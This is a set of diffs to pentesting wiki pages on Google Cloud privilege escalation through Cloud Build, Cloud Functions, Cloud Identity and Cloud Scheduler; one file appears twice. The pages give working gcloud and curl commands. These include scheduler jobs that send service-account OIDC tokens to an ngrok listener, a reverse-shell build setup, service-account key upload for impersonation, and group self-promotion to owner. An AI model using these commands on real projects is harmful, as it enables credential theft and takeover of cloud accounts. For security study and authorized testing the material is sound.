+- [8] [gcp-workstations-containerEscapeScript](https://github.com/AI-redteam/gcp-workstations-containerEscapeScript)
 
 
 

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md
@@ -1,7 +1,5 @@
 # GCP - Cloudbuild Privesc
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## cloudbuild
 
 For more information about Cloud Build check:
@@ -12,12 +10,12 @@ For more information about Cloud Build check:
 
 ### `cloudbuild.builds.create`, `iam.serviceAccounts.actAs`
 
-With this permission you can **submit a cloud build**. The cloudbuild machine will have in it’s filesystem by **default a token of the cloudbuild Service Account**: `<PROJECT_NUMBER>@cloudbuild.gserviceaccount.com`. However, you can **indicate any service account inside the project** in the cloudbuild configuration.\
-Therefore, you can just make the machine exfiltrate to your server the token or **get a reverse shell inside of it and get yourself the token** (the file containing the token might change).
+With this permission you can **submit a cloud build**. The default identity is configuration-dependent: projects may use the Compute Engine default service account or the legacy Cloud Build service account, whose email is `<PROJECT_NUMBER>@cloudbuild.gserviceaccount.com`. You can also **indicate a user-specified service account inside the project** in the Cloud Build configuration; submitting a build with that account requires `iam.serviceAccounts.actAs` on it.<sup>[[1]](#references)[[2]](#references)[[3]](#references)[[5]](#references)</sup>\
+Cloud Build exposes Application Default Credentials to build steps on the `cloudbuild` network, and prior research documents the service-account token as cached in the build environment. Therefore, you can make the machine exfiltrate the token to your server or **get a reverse shell inside of it and get yourself the token**; the file containing the token might change.<sup>[[4]](#references)[[10]](#references)[[13]](#references)</sup>
 
 #### Direct exploitation via gcloud CLI
 
-1- Create `cloudbuild.yaml` and modify with your listener data
+1- Create `cloudbuild.yaml` and modify it with your listener data. The `steps.script` and `options.logging` fields used below are supported Cloud Build configuration fields.<sup>[[4]](#references)</sup>
 
 <details><summary>Cloud Build YAML configuration for reverse shell</summary>
 
@@ -33,25 +31,25 @@ options:
 
 </details>
 
-2- Upload a simple build with no source, the yaml file and specify the SA to use on the build:
+2- Submit a simple build with no source, the YAML file, and the service account to use for the build. The `gcloud builds submit` command supports `--no-source`, `--config`, and `--service-account` for this workflow.<sup>[[6]](#references)</sup>
 
 <details><summary>Submit Cloud Build with specified service account</summary>
 
 ```bash
-gcloud builds submit --no-source --config="./cloudbuild.yaml" --service-account="projects/<PROJECT>/serviceAccounts/<SERVICE_ACCOUNT_ID>@<PROJECT_ID>.iam.gserviceaccount.com
+gcloud builds submit --no-source --config="./cloudbuild.yaml" --service-account="projects/<PROJECT_ID>/serviceAccounts/<SERVICE_ACCOUNT_ID>@<PROJECT_ID>.iam.gserviceaccount.com"
 ```
 
 </details>
 
 #### Using python gcloud library
-You can find the original exploit script [**here on GitHub**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudbuild.builds.create.py) (but the location it's taking the token from didn't work for me). Therefore, check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/f-cloudbuild.builds.create.sh) and a python script to get a reverse shell inside the cloudbuild machine and [**steal it here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/f-cloudbuild.builds.create.py) (in the code you can find how to specify other service accounts)**.**
+You can find the original exploit script [**here on GitHub**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudbuild.builds.create.py) (but the location it's taking the token from didn't work for me). Therefore, check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/f-cloudbuild.builds.create.sh) and a python script to get a reverse shell inside the cloudbuild machine and [**steal it here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/f-cloudbuild.builds.create.py) (in the code you can find how to specify other service accounts)**.**<sup>[[10]](#references)[[11]](#references)[[12]](#references)</sup>
 
-For a more in-depth explanation, visit [https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/](https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/)
+For a more in-depth explanation, visit [https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/](https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/).<sup>[[13]](#references)</sup>
 
 
 ### `cloudbuild.repositories.accessReadToken`
 
-With this permission the user can get the **read access token** used to access the repository:
+With this permission the user can get the **read access token** used to access the repository.<sup>[[7]](#references)</sup>
 
 <details><summary>Get read access token for repository</summary>
 
@@ -67,7 +65,7 @@ curl -X POST \
 
 ### `cloudbuild.repositories.accessReadWriteToken`
 
-With this permission the user can get the **read and write access token** used to access the repository:
+With this permission the user can get the **read and write access token** used to access the repository.<sup>[[8]](#references)</sup>
 
 <details><summary>Get read and write access token for repository</summary>
 
@@ -83,7 +81,7 @@ curl -X POST \
 
 ### `cloudbuild.connections.fetchLinkableRepositories`
 
-With this permission you can **get the repos the connection has access to:**
+With this permission you can **get the repos the connection has access to:**<sup>[[9]](#references)</sup>
 
 <details><summary>Fetch linkable repositories</summary>
 
@@ -95,7 +93,20 @@ curl -X GET \
 
 </details>
 
+## References
+
+- [1] [Default Cloud Build service account](https://cloud.google.com/build/docs/cloud-build-service-account)
+- [2] [Cloud Build default service account change](https://cloud.google.com/build/docs/cloud-build-service-account-updates)
+- [3] [Configure user-specified service accounts](https://cloud.google.com/build/docs/securing-builds/configure-user-specified-service-accounts)
+- [4] [Build configuration file schema](https://cloud.google.com/build/docs/build-config-file-schema)
+- [5] [Cloud Build `projects.builds.create` method](https://cloud.google.com/build/docs/api/reference/rest/v1/projects.builds/create)
+- [6] [`gcloud builds submit` reference](https://cloud.google.com/sdk/gcloud/reference/builds/submit)
+- [7] [Cloud Build `accessReadToken` method](https://cloud.google.com/build/docs/api/reference/rest/v2/projects.locations.connections.repositories/accessReadToken)
+- [8] [Cloud Build `accessReadWriteToken` method](https://cloud.google.com/build/docs/api/reference/rest/v2/projects.locations.connections.repositories/accessReadWriteToken)
+- [9] [Cloud Build `fetchLinkableRepositories` method](https://cloud.google.com/build/docs/api/reference/rest/v2/projects.locations.connections/fetchLinkableRepositories)
+- [10] [Rhino Security Labs Cloud Build exploit script](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudbuild.builds.create.py)
+- [11] [Cloud Build privilege-escalation test script](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/f-cloudbuild.builds.create.sh)
+- [12] [Cloud Build reverse-shell script](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/f-cloudbuild.builds.create.py)
+- [13] [Working-As-Intended: RCE to IAM Privilege Escalation in GCP Cloud Build](https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/)
+
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md
@@ -10,19 +10,19 @@ More information about Cloud Functions:
 
 ### `cloudfunctions.functions.create` , `cloudfunctions.functions.sourceCodeSet`_,_ `iam.serviceAccounts.actAs`
 
-An attacker with these privileges can **create a new Cloud Function with arbitrary (malicious) code and assign it a Service Account**. Then, leak the Service Account token from the metadata to escalate privileges to it.<sup>[[2]](#references)[[3]](#references)[[4]](#references)[[1]](#references)</sup>\
-Some privileges to trigger the function might be required.<sup>[[2]](#references)[[1]](#references)</sup>
+An attacker with these privileges can **create a new Cloud Function with arbitrary (malicious) code and assign it a Service Account**. Then, leak the Service Account token from the metadata to escalate privileges to it.<sup>[[1]](#references)[[2]](#references)[[3]](#references)[[4]](#references)</sup>\
+Some privileges to trigger the function might be required.<sup>[[1]](#references)[[2]](#references)</sup>
 
-Exploit scripts for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.create-call.py) and [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.create-setIamPolicy.py) and the prebuilt .zip file can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/tree/master/ExploitScripts/CloudFunctions).<sup>[[5]](#references)[[6]](#references)[[7]](#references)[[1]](#references)</sup>
+Exploit scripts for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.create-call.py) and [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.create-setIamPolicy.py) and the prebuilt .zip file can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/tree/master/ExploitScripts/CloudFunctions).<sup>[[1]](#references)[[5]](#references)[[6]](#references)[[7]](#references)</sup>
 
 ### `cloudfunctions.functions.update` , `cloudfunctions.functions.sourceCodeSet`_,_ `iam.serviceAccounts.actAs`
 
-An attacker with these privileges can **modify the code of a Function and even modify the service account attached** with the goal of exfiltrating the token.<sup>[[2]](#references)[[3]](#references)[[4]](#references)[[1]](#references)</sup>
+An attacker with these privileges can **modify the code of a Function and even modify the service account attached** with the goal of exfiltrating the token.<sup>[[1]](#references)[[2]](#references)[[3]](#references)[[4]](#references)</sup>
 
 > [!CAUTION]
 > In order to deploy cloud functions you will also need actAs permissions over the default compute service account or over the service account that is used to build the image.<sup>[[4]](#references)[[9]](#references)</sup>
 
-Some extra privileges like the `.call` permission for 1st-gen Cloud Functions or the `roles/run.invoker` role for 2nd-gen HTTP functions might be required to trigger the function.<sup>[[2]](#references)[[12]](#references)[[1]](#references)</sup>
+Some extra privileges like the `.call` permission for 1st-gen Cloud Functions or the `roles/run.invoker` role for 2nd-gen HTTP functions might be required to trigger the function.<sup>[[1]](#references)[[2]](#references)[[12]](#references)</sup>
 
 ```bash
 # Create new code
@@ -57,7 +57,7 @@ gcloud functions call <cloudfunction-name>
 > [!CAUTION]
 > If you get the error `Permission 'run.services.setIamPolicy' denied on resource...` is because you are using the `--allow-unauthenticated` param and you don't have enough permissions for it.<sup>[[11]](#references)[[15]](#references)</sup>
 
-The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.update.py).<sup>[[8]](#references)[[1]](#references)</sup>
+The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.update.py).<sup>[[1]](#references)[[8]](#references)</sup>
 
 ### `cloudfunctions.functions.sourceCodeSet`
 
@@ -88,7 +88,7 @@ gcloud functions add-iam-policy-binding <NOMBRE_FUNCION> \
 
 ### `cloudfunctions.functions.update`
 
-Only having **`cloudfunctions`** permissions, without **`iam.serviceAccounts.actAs`** you **won't be able to update the function SO THIS IS NOT A VALID PRIVESC.**<sup>[[4]](#references)[[15]](#references)[[1]](#references)</sup>
+Only having **`cloudfunctions`** permissions, without **`iam.serviceAccounts.actAs`** you **won't be able to update the function SO THIS IS NOT A VALID PRIVESC.**<sup>[[1]](#references)[[4]](#references)[[15]](#references)</sup>
 
 ### Invoke functions
 With the `cloudfunctions.functions.get`, `cloudfunctions.functions.invoke`, `run.jobs.run`, and `run.routes.invoke` permissions, an identity can directly invoke Cloud Functions. In practice, `cloudfunctions.functions.invoke` is the Cloud Functions API permission for 1st gen, while 2nd gen uses `run.routes.invoke` (normally through `roles/run.invoker`); `cloudfunctions.functions.get` helps discover function metadata, and `run.jobs.run` applies to Cloud Run Jobs rather than HTTP-function invocation.<sup>[[2]](#references)[[12]](#references)</sup>

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md
@@ -1,7 +1,5 @@
 # GCP - Cloudfunctions Privesc
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## cloudfunctions
 
 More information about Cloud Functions:
@@ -12,19 +10,19 @@ More information about Cloud Functions:
 
 ### `cloudfunctions.functions.create` , `cloudfunctions.functions.sourceCodeSet`_,_ `iam.serviceAccounts.actAs`
 
-An attacker with these privileges can **create a new Cloud Function with arbitrary (malicious) code and assign it a Service Account**. Then, leak the Service Account token from the metadata to escalate privileges to it.\
-Some privileges to trigger the function might be required.
+An attacker with these privileges can **create a new Cloud Function with arbitrary (malicious) code and assign it a Service Account**. Then, leak the Service Account token from the metadata to escalate privileges to it.<sup>[[2]](#references)[[3]](#references)[[4]](#references)[[1]](#references)</sup>\
+Some privileges to trigger the function might be required.<sup>[[2]](#references)[[1]](#references)</sup>
 
-Exploit scripts for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.create-call.py) and [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.create-setIamPolicy.py) and the prebuilt .zip file can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/tree/master/ExploitScripts/CloudFunctions).
+Exploit scripts for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.create-call.py) and [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.create-setIamPolicy.py) and the prebuilt .zip file can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/tree/master/ExploitScripts/CloudFunctions).<sup>[[5]](#references)[[6]](#references)[[7]](#references)[[1]](#references)</sup>
 
 ### `cloudfunctions.functions.update` , `cloudfunctions.functions.sourceCodeSet`_,_ `iam.serviceAccounts.actAs`
 
-An attacker with these privileges can **modify the code of a Function and even modify the service account attached** with the goal of exfiltrating the token.
+An attacker with these privileges can **modify the code of a Function and even modify the service account attached** with the goal of exfiltrating the token.<sup>[[2]](#references)[[3]](#references)[[4]](#references)[[1]](#references)</sup>
 
 > [!CAUTION]
-> In order to deploy cloud functions you will also need actAs permissions over the default compute service account or over the service account that is used to build the image.
+> In order to deploy cloud functions you will also need actAs permissions over the default compute service account or over the service account that is used to build the image.<sup>[[4]](#references)[[9]](#references)</sup>
 
-Some extra privileges like `.call` permission for version 1 cloudfunctions or the role `role/run.invoker` to trigger the function might be required.
+Some extra privileges like the `.call` permission for 1st-gen Cloud Functions or the `roles/run.invoker` role for 2nd-gen HTTP functions might be required to trigger the function.<sup>[[2]](#references)[[12]](#references)[[1]](#references)</sup>
 
 ```bash
 # Create new code
@@ -57,13 +55,13 @@ gcloud functions call <cloudfunction-name>
 ```
 
 > [!CAUTION]
-> If you get the error `Permission 'run.services.setIamPolicy' denied on resource...` is because you are using the `--allow-unauthenticated` param and you don't have enough permissions for it.
+> If you get the error `Permission 'run.services.setIamPolicy' denied on resource...` is because you are using the `--allow-unauthenticated` param and you don't have enough permissions for it.<sup>[[11]](#references)[[15]](#references)</sup>
 
-The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.update.py).
+The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.update.py).<sup>[[8]](#references)[[1]](#references)</sup>
 
 ### `cloudfunctions.functions.sourceCodeSet`
 
-With this permission you can get a **signed URL to be able to upload a file to a function bucket (but the code of the function won't be changed, you still need to update it)**
+With this permission you can get a **signed URL to be able to upload a file to a function bucket (but the code of the function won't be changed, you still need to update it)**.<sup>[[2]](#references)[[10]](#references)</sup>
 
 ```bash
 # Generate the URL
@@ -77,7 +75,9 @@ Not really sure how useful only this permission is from an attackers perspective
 
 ### `cloudfunctions.functions.setIamPolicy` , `iam.serviceAccounts.actAs`
 
-Give yourself any of the previous **`.update`** or **`.create`** privileges to escalate.
+Give yourself any of the previous **`.update`** or **`.create`** privileges to escalate.<sup>[[2]](#references)[[4]](#references)[[11]](#references)</sup>
+
+For 1st-gen functions, the binding below grants the Cloud Functions Invoker role; 2nd-gen functions use the Cloud Run Invoker role (`roles/run.invoker`).<sup>[[4]](#references)[[11]](#references)[[12]](#references)</sup>
 
 ```bash
 gcloud functions add-iam-policy-binding <NOMBRE_FUNCION> \
@@ -88,10 +88,11 @@ gcloud functions add-iam-policy-binding <NOMBRE_FUNCION> \
 
 ### `cloudfunctions.functions.update`
 
-Only having **`cloudfunctions`** permissions, without **`iam.serviceAccounts.actAs`** you **won't be able to update the function SO THIS IS NOT A VALID PRIVESC.**
+Only having **`cloudfunctions`** permissions, without **`iam.serviceAccounts.actAs`** you **won't be able to update the function SO THIS IS NOT A VALID PRIVESC.**<sup>[[4]](#references)[[15]](#references)[[1]](#references)</sup>
 
 ### Invoke functions
-With the `cloudfunctions.functions.get`, `cloudfunctions.functions.invoke`, `run.jobs.run`, and run.routes.invoke permissions, an identity can directly invoke Cloud Functions. It is also necessary for the function to allow public traffic, or for the caller to be within the same network as the function itself.
+With the `cloudfunctions.functions.get`, `cloudfunctions.functions.invoke`, `run.jobs.run`, and `run.routes.invoke` permissions, an identity can directly invoke Cloud Functions. In practice, `cloudfunctions.functions.invoke` is the Cloud Functions API permission for 1st gen, while 2nd gen uses `run.routes.invoke` (normally through `roles/run.invoker`); `cloudfunctions.functions.get` helps discover function metadata, and `run.jobs.run` applies to Cloud Run Jobs rather than HTTP-function invocation.<sup>[[2]](#references)[[12]](#references)</sup>
+It is also necessary for the function to allow public traffic, or for the caller to be within the same network as the function itself.<sup>[[11]](#references)[[12]](#references)[[15]](#references)</sup>
 
 ```bash
 curl -X POST "https://<FUNCTION_URL>" \
@@ -102,7 +103,7 @@ curl -X POST "https://<FUNCTION_URL>" \
 
 ### Read & Write Access over the bucket
 
-If you have read and write access over the bucket you can monitor changes in the code and whenever an **update in the bucket happens you can update the new code with your own code** that the new version of the Cloud Function will be run with the submitted backdoored code.
+Cloud Functions deployments store source in Cloud Storage and Cloud Build builds it into a container image.<sup>[[13]](#references)</sup> If you have read and write access over the bucket you can monitor changes in the code and whenever an **update in the bucket happens you can update the new code with your own code** that the new version of the Cloud Function will be run with the submitted backdoored code.
 
 You can check more about the attack in:
 
@@ -119,13 +120,24 @@ However, you cannot use this to pre-compromise third party Cloud Functions becau
 
 ### Read & Write Access over Artifact Registry
 
-When a Cloud Function is created a new docker image is pushed to the Artifact Registry of the project. I tried to modify the image with a new one, and even delete the current image (and the `cache` image) and nothing changed, the cloud function continue working. Therefore, maybe it **might be possible to abuse a Race Condition attack** like with the bucket to change the docker container that will be run but **just modifying the stored image isn't possible to compromise the Cloud Function**.
+For Cloud Functions 2nd gen, deployment pushes a new Docker image to the project's Artifact Registry.<sup>[[13]](#references)</sup> I tried to modify the image with a new one, and even delete the current image (and the `cache` image) and nothing changed, the cloud function continue working. Cloud Run resolves a deployed image tag to a digest and keeps the image copy for the serving revision, so a race-condition attack would need to target the build/deploy window like with the bucket; **just modifying the stored image isn't possible to compromise the Cloud Function**.<sup>[[14]](#references)</sup>
 
 ## References
 
-- [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
+- [1] [Privilege Escalation in Google Cloud Platform - Part 1 (IAM) - Rhino Security Labs](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
+- [2] [Cloud Functions IAM permissions - Google Cloud Documentation](https://cloud.google.com/functions/docs/reference/iam/permissions)
+- [3] [Introduction to service identity - Cloud Run - Google Cloud Documentation](https://cloud.google.com/run/docs/securing/service-identity)
+- [4] [Cloud Functions IAM roles - Google Cloud Documentation](https://cloud.google.com/functions/docs/reference/iam/roles)
+- [5] [cloudfunctions.functions.create-call.py](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.create-call.py)
+- [6] [cloudfunctions.functions.create-setIamPolicy.py](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.create-setIamPolicy.py)
+- [7] [Cloud Functions exploit payloads](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/tree/master/ExploitScripts/CloudFunctions)
+- [8] [cloudfunctions.functions.update.py](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.update.py)
+- [9] [gcloud functions deploy - Google Cloud SDK documentation](https://cloud.google.com/sdk/gcloud/reference/functions/deploy)
+- [10] [Method: projects.locations.functions.generateUploadUrl - Cloud Run functions - Google Cloud Documentation](https://cloud.google.com/functions/docs/reference/rest/v2/projects.locations.functions/generateUploadUrl)
+- [11] [Authorize access with IAM - Cloud Run functions - Google Cloud Documentation](https://cloud.google.com/functions/docs/securing/managing-access-iam)
+- [12] [Authenticate for invocation - Cloud Run functions - Google Cloud Documentation](https://cloud.google.com/functions/docs/securing/authenticating)
+- [13] [Build process overview - Cloud Run functions - Google Cloud Documentation](https://cloud.google.com/functions/docs/building)
+- [14] [Deploy container images to Cloud Run services - Google Cloud Documentation](https://cloud.google.com/run/docs/deploying)
+- [15] [Troubleshoot Cloud Run functions - Google Cloud Documentation](https://cloud.google.com/functions/docs/troubleshooting)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md
@@ -1,7 +1,5 @@
 # GCP - Cloudidentity Privesc
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Cloudidentity
 
 For more information about the cloudidentity service, check this page:
@@ -12,7 +10,7 @@ For more information about the cloudidentity service, check this page:
 
 ### Add yourself to a group
 
-If your user has enough permissions or the group is misconfigured, he might be able to make himself a member of a new group:
+If your user has enough permissions or the group is misconfigured, he might be able to make himself a member of a new group. Cloud Identity defines a membership as the relationship between a group and its member, and the `add` command creates that relationship; omitting `--roles` uses `MEMBER` by default.<sup>[[1]](#references)[[2]](#references)</sup>
 
 <details><summary>Add yourself to a Cloud Identity group</summary>
 
@@ -25,7 +23,9 @@ gcloud identity groups memberships add --group-email <email> --member-email <ema
 
 ### Modify group membership
 
-If your user has enough permissions or the group is misconfigured, he might be able to make himself OWNER of a group he is a member of:
+If your user has enough permissions or the group is misconfigured, he might be able to make himself OWNER of a group he is a member of. `OWNER` is a supported membership role with broad group permissions, and `modify-membership-roles` can grant a new role to an existing membership.<sup>[[1]](#references)[[3]](#references)</sup>
+
+Use `describe` to inspect the current membership before changing its roles; the command accepts the group and member email addresses.<sup>[[4]](#references)</sup>
 
 <details><summary>Modify group membership to become OWNER</summary>
 
@@ -39,7 +39,12 @@ gcloud identity groups memberships modify-membership-roles --group-email <email>
 
 </details>
 
+## References
+
+- [1] [Groups API overview | Cloud Identity | Google Cloud Documentation](https://docs.cloud.google.com/identity/docs/groups)
+- [2] [gcloud identity groups memberships add | Google Cloud SDK | Google Cloud Documentation](https://docs.cloud.google.com/sdk/gcloud/reference/identity/groups/memberships/add)
+- [3] [gcloud identity groups memberships modify-membership-roles | Google Cloud SDK | Google Cloud Documentation](https://docs.cloud.google.com/sdk/gcloud/reference/identity/groups/memberships/modify-membership-roles)
+- [4] [gcloud identity groups memberships describe | Google Cloud SDK | Google Cloud Documentation](https://docs.cloud.google.com/sdk/gcloud/reference/identity/groups/memberships/describe)
+
 {{#include ../../../banners/hacktricks-training.md}}
-
-
 

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.md
@@ -1,7 +1,5 @@
 # GCP - Cloud Scheduler Privesc
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Cloud Scheduler
 
 More information in:
@@ -12,55 +10,68 @@ More information in:
 
 ### `cloudscheduler.jobs.create` , `iam.serviceAccounts.actAs`, (`cloudscheduler.locations.list`)
 
-An attacker with these permissions could exploit **Cloud Scheduler** to **authenticate cron jobs as a specific Service Account**. By crafting an HTTP POST request, the attacker schedules actions, like creating a Storage bucket, to execute under the Service Account's identity. This method leverages the **Scheduler's ability to target `*.googleapis.com` endpoints and authenticate requests**, allowing the attacker to manipulate Google API endpoints directly using a simple `gcloud` command.
+An attacker with these permissions could exploit **Cloud Scheduler** to **authenticate cron jobs as a specific Service Account**. By crafting an HTTP POST request, the attacker schedules actions, like creating a Storage bucket, to execute under the Service Account's identity. This method leverages the **Scheduler's ability to target `*.googleapis.com` endpoints and authenticate requests**, allowing the attacker to manipulate Google API endpoints directly using a simple `gcloud` command.<sup>[[1]](#references)[[2]](#references)[[3]](#references)[[4]](#references)</sup>
 
-- **Contact any google API via`googleapis.com` with OAuth token header**
+- **Contact any Google API via `googleapis.com` with an OAuth token header.**<sup>[[1]](#references)[[3]](#references)[[4]](#references)</sup>
 
-Create a new Storage bucket:
+For example, create a new Storage bucket through the Cloud Storage JSON API:<sup>[[1]](#references)[[5]](#references)[[7]](#references)</sup>
 
 <details><summary>Create Cloud Scheduler job to create GCS bucket via API</summary>
 
 ```bash
-gcloud scheduler jobs create http test --schedule='* * * * *' --uri='https://storage.googleapis.com/storage/v1/b?project=<PROJECT-ID>' --message-body "{'name':'new-bucket-name'}" --oauth-service-account-email 111111111111-compute@developer.gserviceaccount.com --headers "Content-Type=application/json" --location us-central1
+gcloud scheduler jobs create http test --schedule='* * * * *' --uri='https://storage.googleapis.com/storage/v1/b?project=<PROJECT-ID>' --message-body '{"name":"new-bucket-name"}' --oauth-service-account-email 111111111111-compute@developer.gserviceaccount.com --headers "Content-Type=application/json" --location us-central1
 ```
 
 </details>
 
-To escalate privileges, an **attacker merely crafts an HTTP request targeting the desired API, impersonating the specified Service Account**
+The request uses the `buckets.insert` endpoint, which requires the authenticated Service Account to have `storage.buckets.create`.<sup>[[7]](#references)</sup>
 
-- **Exfiltrate OIDC service account token**
+To escalate privileges, an **attacker crafts an HTTP request targeting the desired API and authenticates it as the specified Service Account**.<sup>[[1]](#references)[[3]](#references)[[4]](#references)</sup>
+
+- **Exfiltrate an OIDC service account token.**<sup>[[3]](#references)[[4]](#references)</sup>
 
 <details><summary>Create Cloud Scheduler job to exfiltrate OIDC token</summary>
 
 ```bash
-gcloud scheduler jobs create http test --schedule='* * * * *' --uri='https://87fd-2a02-9130-8532-2765-ec9f-cba-959e-d08a.ngrok-free.app' --oidc-service-account-email 111111111111-compute@developer.gserviceaccount.com [--oidc-token-audience '...']
+gcloud scheduler jobs create http test --schedule='* * * * *' --uri='https://87fd-2a02-9130-8532-2765-ec9f-cba-959e-d08a.ngrok-free.app' --oidc-service-account-email 111111111111-compute@developer.gserviceaccount.com
+
+# Optionally append --oidc-token-audience '<AUDIENCE>' to override the default URI audience.
 
 # Listen in the ngrok address to get the OIDC token in clear text.
 ```
 
 </details>
 
-If you need to check the HTTP response you might just t**ake a look at the logs of the execution**.
+Cloud Scheduler sends the generated OIDC token in the `Authorization` header to the configured endpoint. A listener can capture it, but an OIDC token is audience-bound and is not an OAuth access token for arbitrary Google APIs.<sup>[[3]](#references)[[4]](#references)</sup>
+
+To check the HTTP response, inspect the Cloud Scheduler execution logs; `AttemptFinished` entries include the downstream response status.<sup>[[10]](#references)</sup>
 
 ### `cloudscheduler.jobs.update` , `iam.serviceAccounts.actAs`, (`cloudscheduler.locations.list`)
 
 Like in the previous scenario it's possible to **update an already created scheduler** to steal the token or perform actions. For example:
 
+The update command supports replacing the target URL and authentication token configuration.<sup>[[2]](#references)[[3]](#references)[[4]](#references)[[6]](#references)</sup>
+
 <details><summary>Update existing Cloud Scheduler job to exfiltrate OIDC token</summary>
 
 ```bash
-gcloud scheduler jobs update http test --schedule='* * * * *' --uri='https://87fd-2a02-9130-8532-2765-ec9f-cba-959e-d08a.ngrok-free.app' --oidc-service-account-email 111111111111-compute@developer.gserviceaccount.com [--oidc-token-audience '...']
+gcloud scheduler jobs update http test --schedule='* * * * *' --uri='https://87fd-2a02-9130-8532-2765-ec9f-cba-959e-d08a.ngrok-free.app' --oidc-service-account-email 111111111111-compute@developer.gserviceaccount.com
+
+# Optionally append --oidc-token-audience '<AUDIENCE>' to override the default URI audience.
 
 # Listen in the ngrok address to get the OIDC token in clear text.
 ```
 
 </details>
 
-Another example to upload a private key to a SA and impersonate it:
+Another option is to upload an X.509 public certificate to a service account while keeping the matching private key locally, then use that private key to authenticate as the account. The OAuth service account used by the scheduler needs `iam.serviceAccountKeys.create` on the target service account, and organization policy can disable key uploads.<sup>[[8]](#references)[[9]](#references)</sup>
 
 <details><summary>Upload private key to Service Account via Cloud Scheduler and impersonate it</summary>
 
 ```bash
+# Set this before running the upload command.
+export PROJECT_ID=...
+
 # Generate local private key
 openssl req -x509 -nodes -newkey rsa:2048 -days 365 \
     -keyout /tmp/private_key.pem \
@@ -85,9 +96,8 @@ gcloud scheduler jobs update http scheduler_lab_1 \
 # Wait 1 min
 sleep 60
 
-# Check the logs to check it worked
-gcloud logging read 'resource.type="cloud_scheduler_job" AND resource.labels.job_id="scheduler_lab_1" AND resource.labels.location="us-central1"
